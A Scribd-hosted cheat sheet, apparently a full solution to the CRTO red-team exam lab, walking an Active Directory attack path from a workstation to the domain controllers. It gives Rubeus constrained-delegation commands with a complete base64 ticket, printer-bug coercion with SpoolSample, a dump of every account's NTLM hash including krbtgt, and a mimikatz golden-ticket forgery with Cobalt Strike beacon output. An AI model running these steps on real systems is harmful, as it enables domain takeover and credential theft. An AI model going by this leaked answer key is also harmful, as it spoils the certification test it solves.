Scribd
Upload
1K views6 pages

CRTO v1

Uploaded by

soheil hashemi
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
1K views6 pages

CRTO v1

Uploaded by

soheil hashemi
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 6

Rdp into given machine

AttackPath:

First machine It will be wkstn3


Wkstn-3 (always elevated) -> srv-1 (constrained delegation)-> srv-2 (unconstrained delegation printer
bug)-> dc-2 -> cross trust > dc-1 >sql

Install PowerShell 6 if u need bypass Constrained language mode,


you need to bypass av at wkstn-3 and from the enumeration( your beacon need to be undetected if
using CS)
If using covenant https://luemmelsec.github.io/Circumventing-Countermeasures-In-AD/

Open ur beacon to get a shell back. To get system u need to follow course material always install
elevated and change it to lapsx64.msi as per the app locker policy and place in task.

Run bloodhound
asperoast jjames and atorres and crack them
Psexec into srv-1
On srv-1

Impersonate ofisher with contrained delegation

shell c:\temp\rubeus.exe s4u /domain:child.redteamops.local


/ticket:doIFYzCCBV+gAwIBBaEDAgEWooIESzCCBEdhggRDMIIEP6ADAgEFoRgbFkNISUxELlJFRFRFQU1P
UFMuTE9DQUyiKzApoAMCAQKhIjAgGwZrcmJ0Z3QbFkNISUxELlJFRFRFQU1PUFMuTE9DQUyjggPvMII
D66ADAgESoQMCAQKiggPdBIID2baP41WgentW8su9Hevgb/J4Mygq32wmOqQ7f4N9Kx4WaVRS5D8
Mc3vQ7R/XO3ARAY7RV1MyBg7CQENMK87Wfgejad2a0bYXyHu1moCDjYHjNMJO3n4zOZ7FkDPEDOy
RJPgUae1EO9vsipYJjz2/PhBeq2+x6sAFtv7eFIUzzgJeWFyNj5FI/8QWfHwczI08nGDVwHK6rILbNp0e/6T
ychIBtHROnBccvOapIiitWWN4j6Ra5YokuFCp7ZBlX2LQhKSjTnM2/ik9fyMW21RuP6bU6VmSZDNTBRA
QNDoAlwFRR8aE/2LmQ8Mjyj7mCgd7z3jtjdJHaaUqLLkRb2kBzf6QPsnG7KgaWUri+hwk7zrLzFzMHAJN
qy9Y98b31cmUMwj/25lHsPX0WoB4Plb29Rja6GtSzEQ5Y+Tj6VpTXL9DpKJke1hMQc+T44rdEG35ACrZ
NL3Y7A+E3tNhhcFP/xmqXtWqlz6Iar2A5eMw1QXO5qtj670U1KvmSY/rS8gxS9ey/pApYlXZASbaq8Mhy
HsqF9RKy4H+96Y+kTQvma9sN2KaLVHfeUp9BULFCdzFJY3A6QPjI+gOaYacMqvcdkUINrquNLXMuAZHk
2cME43Y4VytTTX8XApVBnIhEVGNb8fPaarXOzO4UNlFi4bpuWKGfOtthLCYZMU/hu02V5JqskJG907kPn
OED40klDpi4izgCaJK5vJ44/Qh0D8njjr4TN6EpbpcfrVmokCX1muUU8zlEHy6XglP1OkQH+29OZV9U/7V/
xq5+tdTPfOC4YrkYVZxBR/N2wPXYzKjK1q7Fx3AVigU45xiwBbSt1pEcp/lmyw8iN1nVDPWmV4kV+wS/b
+jj3oTOH1s/EVhDjNI567gL7U9GkZ7I59Ch/FvzKDpMzRrYmn0RB1B6QpAEr7r0P9aGXmd1M21SEVkJgC
TM7aYvCLeCq5Eh2NtWJRct6Qz27WIZZ4K5g5RPHs/ZQr5UPgTCh1taPAdV9wmFcoUDy+tGgVSb+S+Vi2
qp6R3pIJomqTzjyUTbilqCh0OZT6Nk8H2N5Sf4e49apyD1SJsdf7qHXg6TPyD6YVZzL7j3WSzRbOV2wrHx
TRO+fug2yx2ZO6GZga4PdDmda5Lpq+BNZFX+ADZ/hxtMJpIv6tVbTEK02eJUApow/Q1k30Jnmv+hM0q
r/bKrqvlcQnRUtuEQd/phdNIgVSjjIcH+V0WGFkvUiH0Mrlh3msx1ndnzD97GPkb7puXTNxYoEwT4Y7VR
eUJSjZ2Z8ia/n3vP5aCkJgTBa9pOEpk9O7d8bLNTSp4sRgkiQpuMWCjggECMIH/oAMCAQCigfcEgfR9gfE
wge6ggeswgegwgeWgKzApoAMCARKhIgQgepHAZAV9TuCTEZnPcjMLIKALQhUXreRqmQh2OhBNkzuh
GBsWQ0hJTEQuUkVEVEVBTU9QUy5MT0NBTKITMBGgAwIBAaEKMAgbBlNSVi0xJKMHAwUAYKEAAKU
RGA8yMDIxMDEzMTAzMzAwN1qmERgPMjAyMTAxMzExMzMwMDdapxEYDzIwMjEwMjA1MTIzNTM
2WqgYGxZDSElMRC5SRURURUFNT1BTLkxPQ0FMqSswKaADAgECoSIwIBsGa3JidGd0GxZDSElMRC5SR
URURUFNT1BTLkxPQ0FM
/impersonateuser:Administrator /msdsspn:time/srv-2.child.redteamops.local /altservice:cifs,host
/ptt

Do uncontrained delegation on srv-2 to reach dc-2


.\Rubeus.exe monitor /interval:1 (run this on the computer with unconstrained delegation)
Then on another window: .\SpoolSample.exe targetMachine.dc.local currentMachine.local

so get 2 shells, first start rubeus monitor

then use SpoolSample.exe to trigger printer bug

so for you it will be .\SpoolSample.exe dc-2.child.redteamops.local srv-2.child.redteamops.local For


me i just ran monitor and got the tgt
Rubeus.exe ptt /ticket:<<paste the above ticket here>>

Jump to dc-2

Administrator:500:aad3b435b51404eeaad3b435b51404ee:c97d17a1aa433f4706143eaf9509fa99:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6ad171448618690dde2c67f72b85a5ea:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:
::
ZPS-
94107178:2101:aad3b435b51404eeaad3b435b51404ee:37dd0e1e8fb505d2e5baaf4a27d2ddbd:::
atorres:2102:aad3b435b51404eeaad3b435b51404ee:f442e0cc228d1a0cb4621ebce433bcdc:::
jjames:2103:aad3b435b51404eeaad3b435b51404ee:59fc0f884922b4ce376051134c71e22c:::
ofisher:2104:aad3b435b51404eeaad3b435b51404ee:0b51e7394c48a3cd6213e2d2e3dceb54:::
DC-2$:1000:aad3b435b51404eeaad3b435b51404ee:684762dd74088932d08c4291f3d6b10f:::
WKSTN-6$:1104:aad3b435b51404eeaad3b435b51404ee:5a28fee9c547fa6f75439d7aec8e123d:::
WKSTN-5$:1105:aad3b435b51404eeaad3b435b51404ee:4503ec7275fa9b51cc611696fef60f82:::
WKSTN-4$:1106:aad3b435b51404eeaad3b435b51404ee:b4ffef5d5c26fedba82d08e4611b72bd:::
WKSTN-3$:1107:aad3b435b51404eeaad3b435b51404ee:1bd6c35d565146c567d4c6de7cd67807:::
SRV-1$:1109:aad3b435b51404eeaad3b435b51404ee:877781f8fa251a5801dee79ef8ee1074:::
SRV-2$:1110:aad3b435b51404eeaad3b435b51404ee:b2aadbe584c0f2c0d2a56237e8f1fd73:::
RTO$:1103:aad3b435b51404eeaad3b435b51404ee:e84d40ca65ccac1f8c19237653a9db3f:::

mimikatz kerberos::golden /domain:child.redteamops.local /sid:S-1-5-21-2453654091-


643072361669735849 /krbtgt:6ad171448618690dde2c67f72b85a5ea /sids:S-1-5-21-2453654091-
643072361669735849-519 /user:administrator /ptt
[*] Tasked beacon to run mimikatz's kerberos::golden /domain:child.redteamops.local /sid:S-1-5-
212453654091-64307236-1669735849 /krbtgt:6ad171448618690dde2c67f72b85a5ea /sids:S-1-5-21-
2453654091-64307236-1669735849-519 /user:administrator /ptt command
[+] host called home, sent: 706122 bytes [+] received output:
User : administrator
Domain : child.redteamops.local (CHILD)
SID : S-1-5-21-2453654091-64307236-1669735849
User Id : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-2453654091-64307236-1669735849-519 ;
ServiceKey: 6ad171448618690dde2c67f72b85a5ea - rc4_hmac_nt
Lifetime :

-> Ticket : ** Pass The Ticket **

* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated

Golden ticket for 'administrator @ child.redteamops.local' successfully submitted for current session

You might also like